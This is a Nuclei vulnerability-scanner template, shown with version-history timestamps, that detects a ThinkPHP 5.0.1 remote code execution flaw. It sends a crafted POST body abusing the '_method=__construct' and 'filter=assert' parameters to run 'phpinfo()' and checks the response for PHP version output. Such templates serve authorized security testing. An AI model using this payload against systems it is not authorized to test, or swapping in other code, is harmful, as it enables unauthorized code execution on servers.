nuclei-templates/vulnerabilities/thinkphp/thinkphp-501-rce.yaml

29 lines
683 B
YAML
Raw Normal View History

2021-10-26 18:47:42 +00:00
id: thinkphp-501-rce
info:
name: ThinkPHP 5.0.1 RCE
author: lark-lab
severity: critical
2021-10-31 14:00:56 +00:00
description: A vulnerability in ThinkPHP allows remote unauthenticated attackers to cause the product to execute arbitrary code via the 's' parameter.
2021-10-26 18:47:42 +00:00
tags: thinkphp,rce
requests:
- method: POST
path:
- "{{BaseURL}}/?s=index/index/index"
body: "s=phpinfo()&_method=__construct&filter=assert"
headers:
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
words:
- "PHP Extension"
- "PHP Version"
condition: and
- type: status
status:
- 200